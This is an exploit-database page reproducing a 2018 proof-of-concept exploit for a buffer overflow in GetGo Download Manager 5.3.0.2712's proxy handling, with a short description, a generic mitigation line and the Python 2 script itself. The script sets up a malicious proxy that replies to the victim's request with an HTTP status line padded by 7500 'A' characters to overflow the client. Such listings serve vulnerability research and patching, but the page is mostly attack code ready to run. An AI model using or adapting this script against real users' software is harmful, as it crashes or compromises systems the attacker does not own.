header-logo
Suggest Exploit
vendor:
GetGo Download Manager
by:
devcoinfet
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: GetGo Download Manager
Affected Version From: 5.3.0.2712
Affected Version To: 5.3.0.2712
Patch Exists: YES
Related CWE: N/A
CPE: a:getgo_software:getgo_download_manager
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 8 64 bits
2018

Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712

A buffer overflow vulnerability exists in GetGo Download Manager proxy options 5.3.0.2712, where a maliciously crafted response from a proxy can trigger an overflow. The victim must have a proxy selected in order to be vulnerable. The attacker can set the proxy IP of the host running the script and set the port of the proxy on GetGo under proxy settings. When the victim downloads any page or file, the program incorrectly parses the response and passes the request to the malicious host, triggering the overflow.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.
Source

Exploit-DB raw data:

 # Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712
# Date: 01-02-2018
# Tested on Windows 8 64 bits 
# Exploit Author: devcoinfet
# Contact: https://twitter.com/wabefet
# Software Link: http://www.getgosoft.com/getgodm/ 
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution 
 
#to be vulnerable victim must have a  proxy selected that will maliciously return data in response
#select proxy ip of host running this script incase You  have vm running the software
#set port of proxy on getgo under proxy settings as well now when you download any page
#or any file the program incorrectly parses the response and passes request to malicious host triggering overlfow

default_evilbuffer = "A" * 7500

def main():
    ip = "10.10.10.6"
    port = 8055
    fuzz_test(ip,default_evilbuffer,port)
    
def fuzz_test(ip,payload,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((ip, port))
    s.listen(1)
    print "\n[+] Listening on %d ..." % port
 
    cl, addr = s.accept()
    print "[+] Connection accepted from %s" % addr[0]
    print "[+] Pushing fuzz test to %s" % addr[0]
 
    buffer = "HTTP/1.1 200 " + payload + "\r\n"
 
    print cl.recv(1000)
    cl.send(buffer)
    print "[+] Sending Fuzzed buffer From Mailicious Proxy: OK\n"
    print "[+] Payload type Default Buffer of 7500 A's"
 
    sleep(3)
    cl.close()
    s.close()
 
if __name__ == '__main__':
    import socket
    from time import sleep
    main()

Navigation

Suggest Exploit

Services By CQR